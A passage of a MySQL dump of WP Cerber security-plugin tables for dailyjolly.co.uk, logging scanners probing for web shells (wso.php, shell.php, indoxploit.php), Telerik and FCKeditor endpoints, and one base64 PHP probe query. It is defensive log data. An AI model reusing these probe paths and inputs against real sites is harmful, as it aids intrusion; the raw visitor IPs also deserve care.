|0|www.dailyjolly.co.uk/new_license.php',0,19,0),('51.77.78.41',860704297,'',0,1675088336.5894,55,'FqZN2kwiPJGU6VnTbQu0WceA','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('51.77.78.41',860704297,'',0,1675088337.5083,55,'jN0oqpksFOAmESibt83nIdTY','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('51.77.78.41',860704297,'',0,1675088346.9131,55,'l2sU3wI6LQyVBFfcWNDu7e1j','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('51.77.78.41',860704297,'',0,1675088347.8588,55,'CuyE1ORqmZwhDpLXPQgv3JWV','','19|0|0|0|www.dailyjolly.co.uk/modules/modules/modules.php',0,19,0),('51.77.78.41',860704297,'',0,1675088348.9561,55,'Jv81SHnTMIjr4AFeotPD5CUx','','19|0|0|0|www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php',0,19,0),('51.77.78.41',860704297,'',0,1675088350.4432,55,'unlEwUTMfjhb7Hr2O54XIB9L','','19|0|0|0|www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php',0,19,0),('51.77.78.41',860704297,'',0,1675088352.2177,55,'GOnzbuYL9U3TgNmZSHjlJ2qI','','19|0|0|0|www.dailyjolly.co.uk/libraries/joomla/css.php',0,19,0),('51.77.78.41',860704297,'',0,1675088353.5989,100,'KwxOmyI9CVaZJARN5QhoTk6H','','13|0|0|0|www.dailyjolly.co.uk/libraries/joomla/jmails.php',0,13,0),('51.77.78.41',860704297,'',0,1675088354.8105,100,'lUPGRu06LyrYajJIKE4QBh3v','','13|0|0|0|www.dailyjolly.co.uk/libraries/joomla/jmail.php',0,13,0),('51.77.78.41',860704297,'',0,1675088356.0078,55,'3GBV659ysR4OTgEoW7dKjShN','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('51.77.78.41',860704297,'',0,1675088356.9582,55,'QsyoKTnZd086Ap3J7ImqXYkD','','19|0|0|0|www.dailyjolly.co.uk/tmp/vuln.php',0,19,0),('51.77.78.41',860704297,'',0,1675088358.2421,55,'YsUMhzfrP91xDFZNeILkBnyK','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('51.77.78.41',860704297,'',0,1675088359.0170,55,'k35jrNwUO8q7VZMlzB4bG6IJ','','19|0|0|0|www.dailyjolly.co.uk/Marvins.php',0,19,0),('51.77.78.41',860704297,'',0,1675088361.7669,100,'x2ewuXFT6icvk4nNUQl7PL5q','','13|0|0|0|www.dailyjolly.co.uk/rxr.php',0,13,0),('51.77.78.41',860704297,'',0,1675088365.7986,55,'Yb9Aet4RSWasmwpkTFGVKCB0','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('51.77.78.41',860704297,'',0,1675088367.4762,55,'ek0L8fSlsBJ4D6IcWrGQE7RA','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('51.77.78.41',860704297,'',0,1675088368.8025,55,'m4CrO5HhLDquc8jFRaPlB6e2','','19|0|0|0|www.dailyjolly.co.uk/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088369.5008,55,'47QqAy8PJFD5MEocjaI2Gd6v','','19|0|0|0|www.dailyjolly.co.uk/RxR.php',0,19,0),('51.77.78.41',860704297,'',0,1675088370.7271,55,'2cM3NduxKXogVrbj9Qp7a0fz','','19|0|0|0|www.dailyjolly.co.uk/components/com_b2jcontact/izoc.php',0,19,0),('51.77.78.41',860704297,'',0,1675088371.5510,55,'UoHImZJhiqsykwj72rD3XTNu','','19|0|0|0|www.dailyjolly.co.uk/V3.php',0,19,0),('51.77.78.41',860704297,'',0,1675088371.9659,55,'PayOXnc18vsTg6BGDUJIi7AR','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('51.77.78.41',860704297,'',0,1675088379.5323,55,'XDrEKHq1QiZC5dVOzbJNgwmA','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('51.77.78.41',860704297,'',0,1675088380.8150,55,'5oJbsCSDuGVWr8Mwmg7lFpOA','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('51.77.78.41',860704297,'',0,1675088381.8921,55,'Uy76kexvcACWZ9saNMOtKSQh','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('51.77.78.41',860704297,'',0,1675088383.3558,55,'dp2VA0WSxYNaT1trIDjeLsGC','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/bluestork/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088384.6311,55,'TkhxJPX263nQmF0MRC15ovw7','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/bluestork/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088385.2013,55,'7YklTMIzRZxfKhW91egpsJ40','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/hathor/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088385.8565,55,'aM1p0lWgO38kwmY9PisSCQBv','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/hathor/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088386.9224,55,'xU6v7caPZOwGsTJjLoNB41qz','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/isis/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088387.5124,55,'kCoRryML6lTcIYWjtBuKxbvJ','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/isis/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088388.0700,55,'g5G6dbvrjxZPSc8KAqonQDue','','19|0|0|0|www.dailyjolly.co.uk/templates/beez/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088388.7478,55,'xNuTlcz2XgFaLtPROH5f7S1s','','19|0|0|0|www.dailyjolly.co.uk/templates/ja_purity/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088389.4048,55,'7ZkNFxpnHMVTtIdvRqW0jGLz','','19|0|0|0|www.dailyjolly.co.uk/templates/rhuk_milkyway/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088389.8156,55,'PXv2yMfC4TiKDYHquBSAW3bo','','19|0|0|0|www.dailyjolly.co.uk/templates/system/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088390.3087,55,'G50XxQzYcpL1lrKPbC83B7kV','','19|0|0|0|www.dailyjolly.co.uk/templates/system/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088390.9191,55,'Xx7afS6F1UgkiNomd4BwhqMn','','19|0|0|0|www.dailyjolly.co.uk/templates/beez3/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088391.2953,55,'4xYOJhwFACX8IqUf9EQHDWvp','','19|0|0|0|www.dailyjolly.co.uk/templates/beez3/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088391.6463,55,'Lgr9ZocFfDN5n2W81MRwCTP6','','19|0|0|0|www.dailyjolly.co.uk/templates/beez5/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088392.1527,55,'ujDHcJVkMX9GQvhnY206Er8z','','19|0|0|0|www.dailyjolly.co.uk/templates/beez5/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088392.5177,55,'Alq62jGtZYUPL53zsE7a9Jyh','','19|0|0|0|www.dailyjolly.co.uk/templates/beez_20/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088396.2926,55,'NUqmaQEFlCYOGu5Xid3PDVkt','','19|0|0|0|www.dailyjolly.co.uk/templates/beez_20/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088398.0671,55,'m8zBPFcn7lkw29YbMKVhDIGp','','19|0|0|0|www.dailyjolly.co.uk/templates/protostar/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088399.4677,55,'O7ne50DLMIPJuRo1WcyFpbNS','','19|0|0|0|www.dailyjolly.co.uk/templates/protostar/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088400.9743,55,'a9If0RDbHx4MFGuk8plL6wg2','','19|0|0|0|www.dailyjolly.co.uk/templates/atomic/index.php',0,19,0),('51.77.78.41',860704297,'',0,1675088402.3640,55,'sSqoVIMimDhGa31Bx4NXdHLf','','19|0|0|0|www.dailyjolly.co.uk/templates/atomic/error.php',0,19,0),('51.77.78.41',860704297,'',0,1675088406.4478,55,'sBze7fATECdPUbgq9ZcHXx1l','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('51.77.78.41',860704297,'',0,1675088407.8256,55,'4NHMtBFGcQqpYvzhar0ewkJP','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('51.77.78.41',860704297,'',0,1675088409.4791,55,'Qh2JzUlbM5HCOt9m1a4WcjpK','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('51.77.78.41',860704297,'',0,1675088410.1396,55,'yhMjvIXoWTxz2BfFuLO4ND69','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('51.77.78.41',860704297,'',0,1675088416.3270,55,'XmfQlvN9417MUTwjhLyZCtW8','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('51.77.78.41',860704297,'',0,1675088416.7586,55,'kpTGV8Dg4PHrxR6AB0yJLdcQ','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('51.77.78.41',860704297,'',0,1675088417.1222,55,'suAr6QeKdMW9TB5zPi0LYjwG','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('171.217.250.110',2883189358,'',0,1675114449.7143,55,'n34hyHlqOzjxNvLY2aEBsoQu','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('171.217.250.121',2883189369,'',0,1675114449.7572,55,'edunQ52Bi9ElJrHNLUhoK036','','19|0|0|0|www.dailyjolly.co.uk/wdf.php',0,19,0),('125.65.229.77',2101470541,'',0,1675114449.8149,55,'uM9yiRzQ4UmVdX7HJrFfxGlk','','19|0|0|0|www.dailyjolly.co.uk/newfile.php',0,19,0),('110.190.177.201',1857991113,'',0,1675114450.0740,55,'68uV9S7eb0z2M3xEXcPGJnTK','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('110.190.178.244',1857991412,'',0,1675114450.8069,55,'h9T0r6CuBkGsgbfpmNlHciVS','','19|0|0|0|www.dailyjolly.co.uk/apache.php',0,19,0),('171.217.250.225',2883189473,'',0,1675114450.8862,55,'UzpNP0O78gJ4KI5RlVoxed6f','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('182.135.116.130',3062330498,'',0,1675114450.9096,55,'FzoCdeQ8mcNqUksj5vXrI9GA','','19|0|0|0|www.dailyjolly.co.uk/wp-content/x.php',0,19,0),('125.65.228.104',2101470312,'',0,1675114451.0561,55,'QCTA75WP3iGxNkLX0qp2mM1b','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/nginx.php',0,19,0),('125.65.229.149',2101470613,'',0,1675114451.0582,55,'TKD5rL7iAZfqEgFQlH1hM6k4','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/1.php',0,19,0),('182.145.126.39',3062988327,'',0,1675114451.8972,55,'py3eHZgc60ltwshkBfdbYAFR','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/demodata.php',0,19,0),('182.145.92.91',3062979675,'',0,1675114452.0927,55,'lw9bteZu3V7N64iIKmOWXd0D','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/admins.php',0,19,0),('182.135.116.151',3062330519,'',0,1675114452.1806,55,'swEYxBVaedb6ZF2kzhPmtQMo','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('182.145.126.90',3062988378,'',0,1675114452.2316,55,'8WpIU7M6jvVLce1uwtxDTor9','','19|0|0|0|www.dailyjolly.co.uk/admins.php',0,19,0),('125.65.229.210',2101470674,'',0,1675114452.3044,55,'2n58ONi6KgtXFVSQhvrZjezy','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/newfile.php',0,19,0),('110.190.176.9',1857990665,'',0,1675114452.3468,55,'jy90IaArE6UdwqvPHOGeB8Lp','','19|0|0|0|www.dailyjolly.co.uk/wp-content/wdf.php',0,19,0),('171.217.250.234',2883189482,'',0,1675114452.3676,55,'zB0NGFmb61leutIkD9MW4LXs','','19|0|0|0|www.dailyjolly.co.uk/wp-content/admin.php',0,19,0),('182.135.116.34',3062330402,'',0,1675114452.4050,55,'4fBSjalGTFYWHZAeso7Oz9gc','','19|0|0|0|www.dailyjolly.co.uk/wp-content/1.php',0,19,0),('182.135.116.219',3062330587,'',0,1675114452.4420,55,'I6xa4hVq1ByLH8v2UFCwMbT3','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/apache.php',0,19,0),('125.65.228.89',2101470297,'',0,1675114452.5215,55,'JU6cbHekwmRC07fl4rBQdK1a','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/a.php',0,19,0),('171.217.250.225',2883189473,'',0,1675114452.5477,55,'fq3ubIAHh2G5UEkO9wgKYzZo','','19|0|0|0|www.dailyjolly.co.uk/wp-content/nginx.php',0,19,0),('110.190.176.202',1857990858,'',0,1675114452.5710,55,'P6ASWfuZwM2rNEbpvhJiltOC','','19|0|0|0|www.dailyjolly.co.uk/wp-content/newfile.php',0,19,0),('125.65.229.208',2101470672,'',0,1675114452.5711,55,'zAUyxG37il6XcwKvO21djtag','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/1234.php',0,19,0),('125.65.228.104',2101470312,'',0,1675114452.5875,55,'dB7lAufTVNMZH8U9YXjeGDqo','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/x.php',0,19,0),('125.65.229.131',2101470595,'',0,1675114452.6484,55,'NjpWqsRLZ5uYvK1VaUnFDXHt','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wdf.php',0,19,0),('125.65.228.89',2101470297,'',0,1675114452.6546,55,'pPCUaQXWY4VeOcTMZ1m8K6jt','','19|0|0|0|www.dailyjolly.co.uk/nginx.php',0,19,0),('125.65.229.208',2101470672,'',0,1675114452.6639,55,'J83yZzSvCo5WHlkUaX6DQun7','','19|0|0|0|www.dailyjolly.co.uk/wp-content/admins.php',0,19,0),('182.135.116.63',3062330431,'',0,1675114452.6765,55,'h0vHiy6lFdzV5uAPJ8mqktje','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/admin.php',0,19,0),('125.65.228.104',2101470312,'',0,1675114452.7180,55,'b1pCBEJxQrPafUA85GntskeV','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/1.php',0,19,0),('125.65.229.77',2101470541,'',0,1675114452.7292,55,'8DtGYQvkaC0ZyUIc6F1OjzlL','','19|0|0|0|www.dailyjolly.co.uk/wp-content/demodata.php',0,19,0),('171.217.250.121',2883189369,'',0,1675114452.7562,55,'gcWGdRFlVoCsMqK0ZA1YmLXi','','19|0|0|0|www.dailyjolly.co.uk/wp-content/a.php',0,19,0),('125.65.229.181',2101470645,'',0,1675114452.7915,55,'A71DLMmYXx9jTQbzJrGBVhks','','19|0|0|0|www.dailyjolly.co.uk/wp-content/apache.php',0,19,0),('110.190.177.201',1857991113,'',0,1675114452.8890,55,'cBXZrQHkd9vDLgfYeqzPjoim','','19|0|0|0|www.dailyjolly.co.uk/wp-content/1234.php',0,19,0),('182.135.116.184',3062330552,'',0,1675114452.9962,55,'0iQwKGnHtPgRavxWEo8IJCUq','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/nginx.php',0,19,0),('110.190.178.241',1857991409,'',0,1675114453.1411,55,'5PQWw4fiAhIpmUt8elGKaOJB','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/admins.php',0,19,0),('182.135.116.219',3062330587,'',0,1675114453.1558,55,'hAHKCWwXIasQxlS2BfMrNFcJ','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/newfile.php',0,19,0),('125.65.228.89',2101470297,'',0,1675114453.1726,55,'LlhFCSAtuK3VZbQxqeHdIv95','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/apache.php',0,19,0),('171.217.250.225',2883189473,'',0,1675114453.2090,55,'peHGW48wLgXAxZPBMUcd3CDj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/a.php',0,19,0),('182.145.126.90',3062988378,'',0,1675114453.2308,55,'9eM4bZK2UFt5IRoGvylj7awT','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/1234.php',0,19,0),('110.190.178.231',1857991399,'',0,1675114453.3059,55,'guedA3GcSUzOEwLqXpmPTNt1','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/x.php',0,19,0),('43.130.118.66',729970242,'',0,1675116486.0352,55,'NmthJRpO3dZacLuzHTC75yBf','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('147.78.47.230',2471374822,'',0,1675116839.7428,55,'gsIA157kJi8UQE42mzlvNufy','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('43.130.118.66',729970242,'',0,1675122407.6039,55,'c3xrKiwvU9qGO2a6fJAlo7S1','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('154.247.138.225',2599914209,'',0,1675128237.2692,55,'IdfYrZ1uNQ8tBwTpRclMhjbe','','19|0|0|0|www.dailyjolly.co.uk/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128239.4466,55,'n6HzSkvjK1pIOled5VNaUAXF','','19|0|0|0|www.dailyjolly.co.uk/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128241.7338,55,'sidHtQ4AyfCaExmbgTW2YKqe','','19|0|0|0|www.dailyjolly.co.uk/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128242.8197,55,'fkqmb2dtihoDRCaQSENlrWzX','','19|0|0|0|www.dailyjolly.co.uk/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128244.4434,55,'8ZxJFBTAp7RvQyzYf14ugrlN','','19|0|0|0|www.dailyjolly.co.uk/App_Master/Telerik.Web.UI.DialogHandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128244.4845,10,'8ZxJFBTAp7RvQyzYf14ugrlN','','707|0|0|0|www.dailyjolly.co.uk/App_Master/Telerik.Web.UI.DialogHandler.aspx',0,707,0),('154.247.138.225',2599914209,'',0,1675128248.5792,55,'Vros75hiO6y8g9nqS4cHjNaR','','19|0|0|0|www.dailyjolly.co.uk/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128250.5217,55,'aRAUdmJDTwNPOSp8H4eEsMiv','','19|0|0|0|www.dailyjolly.co.uk/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128252.5861,55,'3XlEk6S7aVLpY2hvBsTbGmP1','','19|0|0|0|www.dailyjolly.co.uk/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128255.1266,55,'J0lXCw1zc4eDNT9RQY5HuhOs','','19|0|0|0|www.dailyjolly.co.uk/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128257.7307,55,'6J2r4CHSEe0GwMknp8zFoiNU','','19|0|0|0|www.dailyjolly.co.uk/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128259.2293,55,'40tOMfT6AQnjBw95DK2UGcC8','','19|0|0|0|www.dailyjolly.co.uk/Telerik.Web.UI.DialogHandler.axd',0,19,0),('154.247.138.225',2599914209,'',0,1675128261.0158,55,'iz6RWy4b0JkpBIU8AhnmHqaS','','19|0|0|0|www.dailyjolly.co.uk/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx',0,19,0),('154.247.138.225',2599914209,'',0,1675128264.9042,55,'P64eWpOXBv5bwofsT8g0JAnk','','19|0|0|0|www.dailyjolly.co.uk/DesktopModule/UIYKienCuTri/Telerik.Web.UI.DialogHandler.aspx',0,19,0),('4.233.147.230',82416614,'',0,1675197120.5305,55,'2wLDXkIoEM7N0ydTUK3FtabB','','19|0|0|0|www.dailyjolly.co.uk/wp-22.php',0,19,0);
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_qmem`
--

DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `stamp` int(10) unsigned NOT NULL,
  KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_qmem`
--

LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_traffic`
--

DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `hostname` varchar(250) NOT NULL DEFAULT '',
  `uri` text NOT NULL,
  `request_fields` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `request_details` mediumtext NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `processing` int(10) NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `wp_type` int(10) unsigned NOT NULL DEFAULT 0,
  `is_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `blog_id` int(10) unsigned NOT NULL DEFAULT 0,
  `php_errors` text NOT NULL,
  `req_status` int(10) unsigned NOT NULL DEFAULT 0,
  KEY `stamp` (`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_traffic`
--

LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
INSERT INTO `cerber_traffic` VALUES ('185.244.175.134',3119820678,'','https://www.dailyjolly.co.uk/wp-content/74034.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','lL6zj3FD9qZXuOnePgyvk5tW',0,1672790615.9696,240,'','GET',403,0,700,0,1,'',0),('206.189.74.36',3468511780,'','https://dailyjolly.co.uk/public/la.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/13.1.2 Mobile\\/15E148 Safari\\/604.1\"}','cBZ94p0UfmCjVn5SvO2KdkgN',0,1672815042.9090,1100,'','GET',403,0,700,0,1,'',0),('125.65.229.149',2101470613,'','https://www.dailyjolly.co.uk/eweb/login_admin.asp','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/eweb\\/login_admin.asp\"}','98KWNcoZVJIwyLv62aF14rHB',0,1673440021.6338,271,'','GET',403,0,700,0,1,'',0),('185.36.81.21',3106165013,'','https://dailyjolly.co.uk/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','216IZjvDWVsHJTdYlQzwhRqC',0,1673461186.7587,229,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Ft6qj7iP3aMWVcmsrZTLye0I',0,1673486564.6568,203,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-admin/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','C1bcoyk9rOgn3PHafu6AvQUm',0,1673486565.7388,198,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','12Ul7ThfPtxBj38eYbcqDXmM',0,1673486566.5224,212,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Nu0xbCUlRkX8QTL1vy7iSgVW',0,1673486567.2447,198,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-includes/wp-includes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','e6dp0MrGctIji489B2lDxHSm',0,1673486567.8050,175,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/123.php?1=dmFyX2R1bXAoIjg1NjQ1dzQiKTs=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','hd90DFeL8CP5nYsOE1rxlXRi',0,1673486568.3740,171,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-admin/js/widgets/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','XwGZnRT6VyLuPxWhA8q7tUIB',0,1673486568.9696,169,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/nf_tracking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','xqBJPjXL6b1UyC98o7YMTQ02',0,1673486569.5630,200,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','UwlDzS9VspfMQxnGEN5kOFqL',0,1673486570.0819,210,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Lj0ShZCQvyqYDM46z9B3xlpd',0,1673486570.7354,228,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-content/plugins/wp-light/wp-light.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2CyrOxl0D4Gh3kiBQEZUwejg',0,1673486573.5205,177,'','GET',403,0,700,0,1,'',0),('159.89.88.144',2673432720,'','https://www.dailyjolly.co.uk/wp-content/plugins/networker/networker.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 